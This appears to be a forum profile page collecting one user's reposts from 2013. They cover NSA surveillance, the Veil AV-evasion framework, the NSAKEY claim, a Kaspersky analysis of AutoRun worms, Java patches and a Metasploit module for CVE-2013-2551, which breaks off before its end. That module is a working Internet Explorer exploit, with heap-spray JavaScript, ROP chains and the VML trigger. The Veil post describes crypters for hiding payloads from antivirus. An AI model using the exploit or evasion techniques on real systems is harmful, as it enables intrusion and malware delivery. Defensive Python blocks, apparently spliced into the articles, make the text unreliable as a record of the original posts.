Nytro

Everything posted by Nytro

  1. I didn't write it. There would be a great many things to say. Have a little patience...
  2. Evidence that the NSA Is Storing Voice Content, Not Just Metadata

    Interesting speculation that the NSA is storing everyone's phone calls, and not just metadata. Definitely worth reading.

    I expressed skepticism about this just a month ago. My assumption had always been that everyone's compressed voice calls are just too much data to move around and store. Now, I don't know. There's a bit of a conspiracy-theory air to all of this speculation, but underestimating what the NSA will do is a mistake. General Alexander has told members of Congress that they can record the contents of phone calls. And they have the technical capability.

        Earlier reports have indicated that the NSA has the ability to record nearly all domestic and international phone calls -- in case an analyst needed to access the recordings in the future. A Wired magazine article last year disclosed that the NSA has established "listening posts" that allow the agency to collect and sift through billions of phone calls through a massive new data center in Utah, "whether they originate within the country or overseas." That includes not just metadata, but also the contents of the communications.

        William Binney, a former NSA technical director who helped to modernize the agency's worldwide eavesdropping network, told the Daily Caller this week that the NSA records the phone calls of 500,000 to 1 million people who are on its so-called target list, and perhaps even more. "They look through these phone numbers and they target those and that's what they record," Binney said.

        Brewster Kahle, a computer engineer who founded the Internet Archive, has vast experience storing large amounts of data. He created a spreadsheet this week estimating that the cost to store all domestic phone calls a year in cloud storage for data-mining purposes would be about $27 million per year, not counting the cost of extra security for a top-secret program and security clearances for the people involved.

    I believe that, to the extent that the NSA is analyzing and storing conversations, they're doing speech-to-text as close to the source as possible and working with that. Even if you have to store the audio for conversations in foreign languages, or for snippets of conversations the conversion software is unsure of, it's a lot fewer bits to move around and deal with.

    And, by the way, I hate the term "metadata." What's wrong with "traffic analysis," which is what we've always called that sort of thing?

    Source: Schneier on Security: Evidence that the NSA Is Storing Voice Content, Not Just Metadata
  3. Veil – AV Evasion

    Veil v2.0 : Towards a True Framework
    June 17, 2013 by The Grayhound
    Repo Location: https://github.com/ChrisTruncer/Veil

    Team Veil is proud to announce the release of Veil v2.0. This drastically reworked version of the Veil AV-evasion framework incorporates a new structure, a slew of new features, and a variety of new payloads:

    New Structure

    Veil has moved from a single flat file towards a truly modular framework:

    - Payload modules dropped into ./modules/payloads/[language] are loaded into the framework automatically
    - Common reusable functions are stored in various files in ./modules/common/*
    - Source/compiled files are output by default to ./output/source/ and ./output/compiled/
    - ./config/update.py is executed automatically on first run, producing a common configuration file at ./config/veil.py, which can be edited manually
    - External tools used by payloads are stored in ./tools/
    - ./doc/* contains pydoc generated documentation for the framework

    A tutorial describing how to develop payload modules is forthcoming.

    New features

    Veil's menus and interface have been redesigned for increased usability.

    One of the common requests for Veil was the inclusion of additional msfvenom shellcode payloads. To incorporate this, we built in automatic crawling of the metasploit /windows/* payload tree and the extraction of necessary payload parameters. The payloads should tab complete within the shellcode selection menu, in msfvenom windows/PAYLOAD format.

    Tab completion has also been added in a variety of places around the framework, including most menus, LHOST for IP completion, and LPORT for 4444 completion. Try it out!

    A new python 'crypter' named 'pyherion' (inspired by Null Security's Hyperion) has been introduced, which encapsulates python payload files in an AES/base64 encoded wrapper that dynamically decodes/decrypts the python code in memory and executes it. A standalone version has also been introduced in ./tools/pyherion.py. A short post explaining its implementation details will be forthcoming.

    Command line switches have been implemented for almost all options. Type ./Veil.py -h for details.

    New payloads

    - C payloads – Using both a void pointer reference and direct injection into memory with VirtualAlloc calls
    - Powershell – VirtualAlloc injection, MSF-psexec formatted resource file generation, and download/execution of a secondary payload.
    - C# payloads – VirtualAlloc and base64 obfuscated payloads have been introduced, along with C# .exe compilation.
    - Native payloads – hyperion and pescrambler

    Source: https://www.veil-evasion.com/
  4. Internship at the Government for young students or graduates with basic IT knowledge. What criteria they must meet

    Students or graduates of bachelor's degree programmes aged up to 25 with basic IT knowledge can apply until 1 July for a specialised practical training programme (internship) at the Prime Minister's Chancellery or the General Secretariat of the Government.

    The initiative is based on the governing programme, which provides for the creation of a genuine internship system in central and local public administration for students with outstanding results, the Executive reports.

    An internship programme consists of a period of on-the-job training for professional careers, aimed at students or university graduates, through which they can become familiar with the particularities of an institution and learn its workflow while directly supporting employees in their daily tasks.

    To be included in the programme, applicants must cumulatively meet a series of eligibility criteria: hold Romanian citizenship, be aged up to 25, be students or recent graduates of bachelor's degree programmes, have a good command of at least one widely used foreign language, and have basic IT knowledge (advanced knowledge for applications to the Online Services and Design Directorate).

    Shortlisted candidates will be asked for additional supporting documents for their application.

    The application form is available on the website internship.gov.ro, and the deadline for submitting applications, by e-mail to the programme's official address internship@gov.ro, is 1 July 2013 inclusive. Applications received after that date will not be considered.

    The selected candidates will be assigned, according to their competences, to the Prime Minister's Chancellery or the General Secretariat of the Government.

    Source: Internship at the Government for young students or graduates with basic IT knowledge. What criteria they must meet - Mediafax
  5. How NSA access was built into Windows

    Duncan Campbell, 04.09.1999
    Careless mistake reveals subversion of Windows by NSA.

    A careless mistake by Microsoft programmers has revealed that special access codes prepared by the US National Security Agency have been secretly built into Windows. The NSA access system is built into every version of the Windows operating system now in use, except early releases of Windows 95 (and its predecessors).

    The discovery comes close on the heels of the revelations earlier this year that another US software giant, Lotus, had built an NSA "help information" trapdoor into its Notes system, and that security functions on other software systems had been deliberately crippled.

    The first discovery of the new NSA access system was made two years ago by British researcher Dr Nicko van Someren. But it was only a few weeks ago when a second researcher rediscovered the access system. With it, he found the evidence linking it to NSA.

    Computer security specialists have been aware for two years that unusual features are contained inside a standard Windows software "driver" used for security and encryption functions. The driver, called ADVAPI.DLL, enables and controls a range of security functions. If you use Windows, you will find it in the C:\Windows\system directory of your computer.

    ADVAPI.DLL works closely with Microsoft Internet Explorer, but will only run cryptographic functions that the US government allows Microsoft to export. That information is bad enough news, from a European point of view. Now, it turns out that ADVAPI will run special programmes inserted and controlled by NSA. As yet, no-one knows what these programmes are, or what they do.

    Dr Nicko van Someren reported at last year's Crypto 98 conference that he had disassembled the ADVAPI driver. He found it contained two different keys. One was used by Microsoft to control the cryptographic functions enabled in Windows, in compliance with US export regulations. But the reason for building in a second key, or who owned it, remained a mystery.

    A second key

    Two weeks ago, a US security company came up with conclusive evidence that the second key belongs to NSA. Like Dr van Someren, Andrew Fernandes, chief scientist with Cryptonym of Morrisville, North Carolina, had been probing the presence and significance of the two keys. Then he checked the latest Service Pack release for Windows NT4, Service Pack 5. He found that Microsoft's developers had failed to remove or "strip" the debugging symbols used to test this software before they released it. Inside the code were the labels for the two keys. One was called "KEY". The other was called "NSAKEY".

    Fernandes reported his re-discovery of the two CAPI keys, and their secret meaning, to the "Advances in Cryptology, Crypto'99" conference held in Santa Barbara. According to those present at the conference, Windows developers attending the conference did not deny that the "NSA" key was built into their software. But they refused to talk about what the key did, or why it had been put there without users' knowledge.

    A third key?!

    But according to two witnesses attending the conference, even Microsoft's top crypto programmers were astonished to learn that the version of ADVAPI.DLL shipping with Windows 2000 contains not two, but three keys. Brian LaMacchia, head of CAPI development at Microsoft, was "stunned" to learn of these discoveries, by outsiders. The latest discovery by Dr van Someren is based on advanced search methods which test and report on the "entropy" of programming code.

    Within the Microsoft organisation, access to Windows source code is said to be highly compartmentalized, making it easy for modifications to be inserted without the knowledge of even the respective product managers.

    Researchers are divided about whether the NSA key could be intended to let US government users of Windows run classified cryptosystems on their machines or whether it is intended to open up anyone's and everyone's Windows computer to intelligence gathering techniques deployed by NSA's burgeoning corps of "information warriors".

    According to Fernandes of Cryptonym, the result of having the secret key inside your Windows operating system "is that it is tremendously easier for the NSA to load unauthorized security services on all copies of Microsoft Windows, and once these security services are loaded, they can effectively compromise your entire operating system". The NSA key is contained inside all versions of Windows from Windows 95 OSR2 onwards.

    "For non-American IT managers relying on Windows NT to operate highly secure data centres, this find is worrying", he added. "The US government is currently making it as difficult as possible for 'strong' crypto to be used outside of the US. That they have also installed a cryptographic back-door in the world's most abundant operating system should send a strong message to foreign IT managers".

    "How is an IT manager to feel when they learn that in every copy of Windows sold, Microsoft has a 'back door' for NSA - making it orders of magnitude easier for the US government to access your computer?" he asked.

    Can the loophole be turned round against the snoopers?

    Dr van Someren feels that the primary purpose of the NSA key inside Windows may be for legitimate US government use. But he says that there cannot be a legitimate explanation for the third key in Windows 2000 CAPI. "It looks more fishy", he said.

    Fernandes believes that NSA's built-in loophole can be turned round against the snoopers. The NSA key inside CAPI can be replaced by your own key, and used to sign cryptographic security modules from overseas or unauthorised third parties, unapproved by Microsoft or the NSA. This is exactly what the US government has been trying to prevent. A demonstration "how to do it" program that replaces the NSA key can be found on Cryptonym's website.

    According to one leading US cryptographer, the IT world should be thankful that the subversion of Windows by NSA has come to light before the arrival of CPUs that handle encrypted instruction sets. These would make the type of discoveries made this month impossible. "Had the next-generation CPUs with encrypted instruction sets already been deployed, we would have never found out about NSAKEY."

    Source: How NSA access was built into Windows | Telepolis
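    The entropy-based search for embedded key material that the article attributes to Dr van Someren can be illustrated with a sliding-window scan. This is an added example, not the researcher's tool or any Microsoft code; the 8 KiB image it scans is constructed inside the block as a stand-in for a DLL, and the window size and threshold are assumptions that have to be tuned per binary.

```python
import math
import hashlib

def shannon_entropy(window: bytes) -> float:
    """Shannon entropy of a byte window in bits per byte (0.0 .. 8.0)."""
    if not window:
        return 0.0
    counts = [0] * 256
    for b in window:
        counts[b] += 1
    n = len(window)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)

def find_high_entropy_regions(data: bytes, window: int = 128, step: int = 16,
                              threshold: float = 5.5) -> list:
    """Slide a window over data and merge consecutive windows whose entropy
    is >= threshold into (start, end, peak_entropy) regions.

    The threshold must be chosen relative to the window: W bytes can show at
    most log2(W) bits per byte (7.0 for W=128), so the 7.x figures usually
    quoted for 'random' data only apply to windows of 256 bytes or more.
    Compiled x86 code typically sits around 3 to 5 bits per byte, while an
    RSA modulus or other key material is close to the ceiling for its size.
    """
    regions = []
    current = None
    last_start = max(len(data) - window, 0)
    for off in range(0, last_start + 1, step):
        h = shannon_entropy(data[off:off + window])
        if h >= threshold:
            if current is None:
                current = [off, off + window, h]
            else:                       # extend the open region
                current[1] = off + window
                current[2] = max(current[2], h)
        elif current is not None:       # entropy dropped: close the region
            regions.append(tuple(current))
            current = None
    if current is not None:
        regions.append(tuple(current))
    return regions

def scan_file(path: str, **kwargs) -> list:
    """Scan an on-disk image (for example a DLL) for candidate key blobs."""
    with open(path, "rb") as fh:
        return find_high_entropy_regions(fh.read(), **kwargs)

# Constructed test image (not a real Windows binary): 8 KiB of a repeating
# x86-like byte pattern standing in for code, with a 256-byte blob derived by
# SHA-256 chaining planted at KEY_OFFSET to stand in for an embedded public
# key. The blob is deterministic so the scan result is reproducible.
KEY_OFFSET = 4096
KEY_LEN = 256

def build_sample_image() -> bytes:
    filler = b"\x55\x8b\xec\x83\xec\x10\x53\x56\x57\x8b\x7d\x08\x33\xc0\x90\x90"
    image = bytearray(filler * (8192 // len(filler)))
    blob, state = b"", b"constructed-sample-key-material"
    while len(blob) < KEY_LEN:
        state = hashlib.sha256(state).digest()
        blob += state
    image[KEY_OFFSET:KEY_OFFSET + KEY_LEN] = blob[:KEY_LEN]
    return bytes(image)

if __name__ == "__main__":
    for start, end, peak in find_high_entropy_regions(build_sample_image()):
        print(f"candidate key material at 0x{start:x}-0x{end:x} "
              f"(peak {peak:.2f} bits/byte)")
```

    On a real binary the same scan also lights up compressed resources and hashed string tables, so flagged regions still need to be cross-checked against the PE section they fall in.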
  6. Nytro

    Fun stuff

    http://fbcdn-sphotos-g-a.cloudliv.net/hphotos-ak-ash4/5223013_371023452991370_522301357_n.jpgb
  7. AutoRun. Reloaded

    Konstantin Markov, Kaspersky Lab Expert
    Posted June 13, 11:17 GMT

    Recent months have produced little of interest among worms written in Java and script languages such as JavaScript and VBScript. The main reason behind this was the limited proficiency of the virus writers, whose creations were anything but remarkable. However, a couple of malware samples grabbed our attention; their complexity is testimony to the fact that professionals sometimes get involved as well.

    Kaspersky Lab's products detect these special worms as Worm.JS.AutoRun and Worm.Java.AutoRun. They are also detected by heuristic methods as HEUR:Worm.Script.Generic and HEUR:Worm.Java.Generic respectively.

    These two worms have three key features in common: heavy obfuscation, backdoor-type essential payloads, and similar methods of propagation. Both worms spread by copying themselves and the configuration file autorun.inf into the root folders of logical volumes of removable storage media and network disks. If these infected storages are opened on other computers, the infection can spread. Having infected the operating system and established a foothold on the victim computer, the malicious programs deploy their principal payload.

    For months, the number of AutoRun worms detected on Kaspersky Lab users' computers remained essentially unchanged. According to Kaspersky Security Network data, half of all script worms spread themselves this way. As for Java worms, this is not their usual method of propagation. However, in the last three months we have seen a dramatic rise in the number of new Worm.Java.AutoRun modifications.

    [Figure: Detection levels for unique script worms, AutoRun script worms, and heuristically detected AutoRun script worms, April 2012 – May 2013]

    [Figure: Detection levels for Java worms, AutoRun Java worms, and heuristically detected AutoRun Java worms, August 2011 – May 2013]

    Both worms are polymorphic: they modify their bodies during propagation, complicating their detection. This is one of the reasons why they have become more prominent compared with "regular" worms. Below is a narrative of what we have encountered.

    Worm.Java.AutoRun

    There are not many Java-based resident malware programs for PC, and worms are especially rare. So we undertook a detailed analysis of this sample. The worm deploys itself on an infected computer in the form of four files:

    - Java archive: the core component; its name changes in each infection attempt. It is located in the user's temporary folder %TEMP%\jar_cache*.tmp.
    - Autorun.inf: a configuration file which ensures the worm is launched automatically when infected external storage media or a mounted network drive is opened.
    - DLL file: an auxiliary (Win32) DLL which is responsible for part of the propagation task. The name of this file also varies: it is defined at the time when the computer is infected. The DLL is copied to the user's temporary folder: %TEMP%\hsperfdata_%USERNAME%\
    - Java.exe: a legal executable file of the pre-installed JAVA package. The worm uses it to ensure it can always load itself into the memory of an infected computer. When an infection occurs, this executable file is copied from %ProgramFiles% to the user's temporary folder (beside the above DLL) and is given a name associated with a system process, e.g. winlogon, csrss, or services. Then it is executed using the launch parameters of the Java archive, which is the core component.

    [Figure: Fragment of the class-file of a malicious JAVA archive]

    Once initialized, the malicious Java archive extracts a dll from itself, copies itself to the temporary user catalogue and also copies the executable file Java.exe from %ProgramFiles% to the same catalogue, giving it a "trusted" name and executing it with the launch parameters of the duplicated Java archive. Then the Java archive injects the above library into the process created to distribute the worm to any available network sections and removable media. The launched malware occasionally sends requests to a command center to receive instructions from the cybercriminal.

    As well as these quirks, this worm also uses strong obfuscation. Here a packer is used in conjunction with Zelix KlassMaster obfuscation. Also, as mentioned above, the worm is polymorphic. This makes it more difficult for antivirus solutions to detect.

    According to Kaspersky Security Network, the worm is most widely distributed in India and Malaysia. The overall picture is shown on the map below.

    [Figure: Geographical distribution of users protected against Worm.Java.AutoRun, January-May 2013]

    According to the same data, the worm was most frequently picked up by Kaspersky Lab products at the end of May. Most of these detections referred to its most recent modifications, those which provoked the sudden spike in detections. This worm is still actively distributing itself, so we are continuing to closely monitor its activities.

    [Figure: Number of users protected against Worm.Java.AutoRun, April-May 2013]

    Worm.JS.AutoRun

    The distribution model of this worm not only uses the above method with autorun.inf, but also FTP-servers, file share sites, shared folders and CD/DVDs burned on the infected computers. The worm multiplies itself in catalogues and adds its launch to auto launch. At this time it checks the environment where it was launched. If the worm is launched on a non-virtual machine, it starts to search for active monitoring and PC protection tools. If they are detected, the worm terminates their work.

    The malware receives commands via a file downloaded from the command center. These instructions are mostly about collecting information from the infected system. In particular, cybercriminals want the worm to gather information about the system, the user and the installed software. Like Worm.Java.AutoRun, this sample is well-encrypted and can change its form in different infections.

    [Figure: Code fragment for Worm.JS.AutoRun]

    Like the Java worm, this malware is most widespread in Southeast Asia, though this variant is more active in Vietnam and Indonesia.

    [Figure: Geographical distribution of users protected from Worm.JS.AutoRun from the beginning of 2013 to the end of May, 2013]

    [Figure: Number of users protected from Worm.JS.AutoRun from the beginning of 2013 till the end of May, 2013]

    In this diagram you can see the number of users protected with the signature method only. Far more users are protected with heuristic methods, as shown in the first diagram.

    According to Kaspersky Security Network data, Windows XP is widely used in those countries with large numbers of malware detections. More recent Microsoft versions ask users to confirm autorun execution, which decreases the chances of getting infected. Starting from Windows 7, only CD/DVD carriers are allowed to run automatically. When using external storage devices (for instance, a USB flash drive), autorun is switched off.

    In order to protect your computer from infection, we advise you to update critical OS units and antivirus databases installed on the computer. You will find the guidelines about how to set the autorun function and links to updates in the following Microsoft article: http://support.microsoft.com/kb/967715

    Source: AutoRun. Reloaded - Securelist
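    From the defender's side, the two things worth automating here are triage of an autorun.inf found in the root of a removable volume and decoding the NoDriveTypeAutoRun policy that the linked Microsoft article configures. The block below is an added example, not Kaspersky's code or a real sample: both .inf texts are constructed, the heuristics are assumptions, and the bit layout follows the Win32 drive-type constants.

```python
import re

# Drive-type bits of the NoDriveTypeAutoRun policy value (KB 967715 describes the
# policy; the bit positions follow the Win32 GetDriveType constants). 0xFF disables
# AutoRun for every drive type; 0x91 is the classic default.
DRIVE_BITS = {
    "unknown": 0x01, "no_root_dir": 0x02, "removable": 0x04, "fixed": 0x08,
    "remote": 0x10, "cdrom": 0x20, "ramdisk": 0x40,
}

def autorun_allowed(no_drive_type_autorun: int, drive: str) -> bool:
    """True if AutoRun is still permitted for the given drive type."""
    return not (no_drive_type_autorun & DRIVE_BITS[drive])

EXEC_KEYS = {"open", "shellexecute"}
MIMICRY_RE = re.compile(r"open\s+folder|view\s+files|explore", re.I)
EXEC_EXT_RE = re.compile(r"\.(exe|com|bat|cmd|scr|pif|vbs|js|jar|hta)\b", re.I)
HIDDEN_DIR_RE = re.compile(
    r"(^|[\\/])(recycler|recycled|\$recycle\.bin|system volume information)[\\/]", re.I)

def parse_autorun_inf(text: str) -> tuple:
    """Tolerant autorun.inf parser: returns ({key: value}, junk_line_count).

    Keys are lower-cased. Lines inside [autorun] that are neither a comment nor
    key=value are counted as junk; worms pad the file with such lines (and NUL
    bytes) to break naive signature matching, so their presence is a signal."""
    directives, junk, in_autorun = {}, 0, False
    for raw in text.splitlines():
        line = raw.replace("\x00", "").strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if "=" in line:
            if in_autorun:
                key, _, value = line.partition("=")
                directives[key.strip().lower()] = value.strip()
            continue
        junk += 1
    return directives, junk

def triage_autorun_inf(text: str) -> list:
    """Return (severity, reason) findings for one autorun.inf; [] means benign."""
    d, junk = parse_autorun_inf(text)
    findings = []
    exec_keys = sorted(EXEC_KEYS & d.keys())
    for key in exec_keys:
        target = d[key]
        findings.append(("high", f"{key}= runs '{target}' when the volume is opened"))
        if HIDDEN_DIR_RE.search(target):
            findings.append(("high", f"{key}= points into a hidden system folder: '{target}'"))
        if not EXEC_EXT_RE.search(target):
            findings.append(("low", f"{key}= target has no recognised executable extension"))
    for key in sorted(d):
        if key.startswith("shell\\") and key.endswith("\\command"):
            findings.append(("high", f"{key}= hijacks a context-menu verb: '{d[key]}'"))
    action = d.get("action", "")
    if MIMICRY_RE.search(action):
        findings.append(("medium", f"action= mimics the Explorer prompt: '{action}'"))
    icon = d.get("icon", "")
    if "shell32.dll" in icon.lower() and exec_keys:
        findings.append(("medium", f"icon= borrows a system icon while executing code: '{icon}'"))
    if junk:
        findings.append(("medium", f"{junk} junk line(s) between directives (possible obfuscation)"))
    return findings

# Constructed samples (not real artefacts): a vendor disc that only sets an icon
# and label, and a file shaped like the worm behaviour described above.
BENIGN_INF = """[autorun]
icon=vendor.ico
label=Product Disc
"""

SUSPICIOUS_INF = """[AutoRun]
XvQ9kLmE
open=RECYCLER\\S-1-5-21\\svchost.exe
shellexecute=RECYCLER\\S-1-5-21\\svchost.exe
action=Open folder to view files
icon=%SystemRoot%\\system32\\shell32.dll,4
shell\\open\\command=RECYCLER\\S-1-5-21\\svchost.exe
"""

if __name__ == "__main__":
    for sev, reason in triage_autorun_inf(SUSPICIOUS_INF):
        print(f"[{sev}] {reason}")
    print("removable allowed under 0x91:", autorun_allowed(0x91, "removable"))
```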
  8. Critical Java SE update due Tuesday fixes 40 flaws

    And yes, most are remotely exploitable
    By Neil McAllister in San Francisco, 14th June 2013

    Thought your Java security woes were behind you? Think again. Oracle is planning to release a Critical Patch Update on Tuesday that affects multiple versions of Java, and it's another doozy.

    According to Oracle's security announcement, the patch pack addresses 40 different vulnerabilities. All update levels of Java SE 5, 6, and 7 are affected by the flaws, as are all versions of JavaFX.

    Of the 40 bugs, all but three are remotely exploitable over a network without the need for a username or password. Yes, that's bad. Oracle ranks the severity of its flaws using the Common Vulnerability Scoring System (CVSS), and the top-ranked bug in this particular update rates a 10.0 – the highest possible score.

    "Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply Critical Patch Update fixes as soon as possible," the database giant helpfully suggests.

    Oracle ordinarily releases Critical Patch Updates four times a year on a set schedule, but this will already be the fourth such update issued in 2013. The first shipped on February 1, but Oracle reissued it later in the month with additional fixes. It also scheduled another, previously unplanned update for April. Each of those earlier updates contained upward of 40 fixes, and each similarly addressed flaws that rated 10.0 on the CVSS severity scale.

    Oracle has not yet disclosed which vulnerabilities will be patched by the June update, but previous Critical Patch Updates have patched vulnerabilities in a wide range of Java APIs and subsystems. These flaws could potentially affect a whole host of Java software and were not limited to programs running via the Java browser plugin, as has been the case with some previous Java exploits.

    Oracle plans to release its latest Java SE Critical Patch Update on June 18, 2013. After that, the next update is currently scheduled for October 15.

    Source: Critical Java SE update due Tuesday fixes 40 flaws • The Register
  9. Web Developer Security 1.0

    Raymond Forbes and I will be presenting Web Developer Security 1.0 on Tuesday, June 18th at 12:15 pm PDT. The training will be held in Mozilla's Mountain View office and also broadcast online.

    We will cover a grab bag of proactive security measures Web Developers can take to protect their users and their site. Rather than focusing on how to attack a website, this training focuses on how you can safeguard your website from common threats. Some of the topics we will cover include Content Security Policy, X-Frame-Options, cookie security flags, iframe sandbox, content sanitization, and sensitive data encryption. Deploying these techniques will help protect your users and improve the security of your site.

    For those of you who are able to come watch the talk in person, there will be Punch & Pie!

    https://air.mozilla.org/web-security-training/

    Source: Web Developer Security 1.0 | Mozilla Security Blog
  10. MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = NormalRanking

      include Msf::Exploit::Remote::HttpServer::HTML
      include Msf::Exploit::RopDb
      include Msf::Exploit::Remote::BrowserAutopwn

      autopwn_info({
        :ua_name    => HttpClients::IE,
        :ua_minver  => "8.0",
        :ua_maxver  => "8.0",
        :javascript => true,
        :os_name    => OperatingSystems::WINDOWS,
        :rank       => Rank
      })

      def initialize(info={})
        super(update_info(info,
          'Name'           => "MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow",
          'Description'    => %q{
            This module exploits an integer overflow vulnerability on Internet Explorer.
            The vulnerability exists in the handling of the dashstyle.array length for
            vml shapes on the vgx.dll module. This module has been tested successfully
            on Windows 7 SP1 with IE8. It uses the JRE6 to bypass ASLR by default. In
            addition a target to use an info leak to disclose the ntdll.dll base address
            is provided. This target requires ntdll.dll v6.1.7601.17514 (the default dll
            version on a fresh Windows 7 SP1 installation) or ntdll.dll v6.1.7601.17725
            (version installed after applying MS12-001).
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
            [
              'Nicolas Joly', # Vulnerability discovery, PoC and analysis
              '4B5F5F4B',     # PoC
              'juan vazquez'  # Metasploit module
            ],
          'References'     =>
            [
              [ 'CVE', '2013-2551' ],
              [ 'OSVDB', '91197' ],
              [ 'BID', '58570' ],
              [ 'MSB', 'MS13-037' ],
              [ 'URL', 'http://www.vupen.com/blog/20130522.Advanced_Exploitation_of_IE10_Windows8_Pwn2Own_2013.php' ],
              [ 'URL', 'http://binvul.com/viewthread.php?tid=311' ]
            ],
          'Payload'        =>
            {
              'Space'          => 948,
              'DisableNops'    => true,
              'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
            },
          'DefaultOptions' =>
            {
              'InitialAutoRunScript' => 'migrate -f'
            },
          'Platform'       => 'win',
          'Targets'        =>
            [
              [ 'Automatic', {} ],
              [ 'IE 8 on Windows 7 SP1 with JRE ROP', # default
                {
                  'Rop'    => :jre,
                  'Offset' => '0x5f4'
                }
              ],
              # requires:
              # * ntdll.dll v6.1.7601.17514 (fresh W7SP1 installation)
              # * ntdll.dll v6.1.7601.17725 (MS12-001)
              [ 'IE 8 on Windows 7 SP1 with ntdll.dll Info Leak',
                {
                  'Rop'    => :ntdll,
                  'Offset' => '0x5f4'
                }
              ]
            ],
          'Privileged'     => false,
          'DisclosureDate' => "Mar 06 2013",
          'DefaultTarget'  => 0))

        register_options(
          [
            OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
          ], self.class)
      end

      def exploit
        @second_stage_url = rand_text_alpha(10)
        @leak_param = rand_text_alpha(5)
        super
      end

      def get_target(agent)
        # If the target is already specified by the user, we'll just use that
        return target if target.name != 'Automatic'

        nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
        ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

        ie_name = "IE #{ie}"

        case nt
        when '5.1'
          os_name = 'Windows XP SP3'
        when '6.0'
          os_name = 'Windows Vista'
        when '6.1'
          os_name = 'Windows 7'
        end

        targets.each do |t|
          if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
            print_status("Target selected as: #{t.name}")
            return t
          end
        end

        return nil
      end

      def ie_heap_spray(my_target, p)
        js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
        js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))

        # Land the payload at 0x0c0c0c0c
        # For IE 8
        js = %Q|
        var heap_obj = new heapLib.ie(0x20000);
        var code = unescape("#{js_code}");
        var nops = unescape("#{js_nops}");
        while (nops.length < 0x80000) nops += nops;
        var offset = nops.substring(0, #{my_target['Offset']});
        var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
        while (shellcode.length < 0x40000) shellcode += shellcode;
        var block = shellcode.substring(0, (0x80000-6)/2);
        heap_obj.gc();
        for (var i=1; i < 0x300; i++) {
          heap_obj.alloc(block);
        }
        |

        js = heaplib(js, {:noobfu => true})

        if datastore['OBFUSCATE']
          js = ::Rex::Exploitation::JSObfu.new(js)
          js.obfuscate
        end

        return js
      end

      def get_ntdll_rop
        case @ntdll_version
        when "6.1.7601.17514"
          stack_pivot = [
            @ntdll_base+0x0001578a, # ret # from ntdll
            @ntdll_base+0x000096c9, # pop ebx # ret # from ntdll
            @ntdll_base+0x00015789, # xchg eax, esp # ret from ntdll
          ].pack("V*")

          ntdll_rop = [
            @ntdll_base+0x45F18,  # ntdll!ZwProtectVirtualMemory
            0x0c0c0c40,           # ret to shellcode
            0xffffffff,           # ProcessHandle
            0x0c0c0c34,           # ptr to BaseAddress
            0x0c0c0c38,           # ptr to NumberOfBytesToProtect
            0x00000040,           # NewAccessProtection
            0x0c0c0c3c,           # ptr to OldAccessProtection
            0x0c0c0c40,           # BaseAddress
            0x00000400,           # NumberOfBytesToProtect
            0x41414141            # OldAccessProtection
          ].pack("V*")

          return stack_pivot + ntdll_rop
        when "6.1.7601.17725"
          stack_pivot = [
            @ntdll_base+0x0001579a, # ret # from ntdll
            @ntdll_base+0x000096c9, # pop ebx # ret # from ntdll
            @ntdll_base+0x00015799, # xchg eax, esp # ret from ntdll
          ].pack("V*")

          ntdll_rop = [
            @ntdll_base+0x45F18,  # ntdll!ZwProtectVirtualMemory
            0x0c0c0c40,           # ret to shellcode
            0xffffffff,           # ProcessHandle
            0x0c0c0c34,           # ptr to BaseAddress
            0x0c0c0c38,           # ptr to NumberOfBytesToProtect
            0x00000040,           # NewAccessProtection
            0x0c0c0c3c,           # ptr to OldAccessProtection
            0x0c0c0c40,           # BaseAddress
            0x00000400,           # NumberOfBytesToProtect
            0x41414141            # OldAccessProtection
          ].pack("V*")

          return stack_pivot + ntdll_rop
        else
          return ""
        end
      end

      def get_payload(t, cli)
        code = payload.encoded

        # No rop. Just return the payload.
        return code if t['Rop'].nil?

        # Both ROP chains generated by mona.py - See corelan.be
        case t['Rop']
        when :jre
          print_status("Using JRE ROP")
          stack_pivot = [
            0x7c348b06, # ret # from msvcr71
            0x7c341748, # pop ebx # ret # from msvcr71
            0x7c348b05  # xchg eax, esp # ret from msvcr71
          ].pack("V*")
          rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
        when :ntdll
          print_status("Using ntdll ROP")
          rop_payload = get_ntdll_rop + payload.encoded
        end

        return rop_payload
      end

      def load_exploit_html(my_target, cli)
        p  = get_payload(my_target, cli)
        js = ie_heap_spray(my_target, p)

        js_trigger = %Q|
        var rect_array = new Array()
        var a = new Array()

        function createRects(){
          for(var i=0; i<0x1000; i++){
            rect_array[i] = document.createElement("v:shape")
            rect_array[i].id = "rect" + i.toString()
            document.body.appendChild(rect_array[i])
          }
        }

        function exploit(){
          var vml1 = document.getElementById("vml1")
          for (var i=0; i<0x1000; i++){
            a[i] = document.getElementById("rect" + i.toString())._anchorRect;
            if (i == 0x800) {
              vml1.dashstyle = "1 2 3 4"
            }
          }
          vml1.dashstyle.array.length = 0 - 1;
          vml1.dashstyle.array.item(6) = 0x0c0c0c0c;
          for (var i=0; i<0x1000; i++) {
            delete a[i];
            CollectGarbage();
          }
          location.reload();
        }
        |

        create_rects_func = "createRects"
        exploit_func = "exploit"

        if datastore['OBFUSCATE']
          js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger)
          js_trigger.obfuscate
          create_rects_func = js_trigger.sym("createRects")
          exploit_func = js_trigger.sym("exploit")
        end

        html = %Q|
        <html>
        <head>
        <script>
        #{js}
        </script>
        <meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" >
        </head>
        <title> </title>
        <style>v\\: * { behavior:url(#default#VML); display:inline-block }</style>
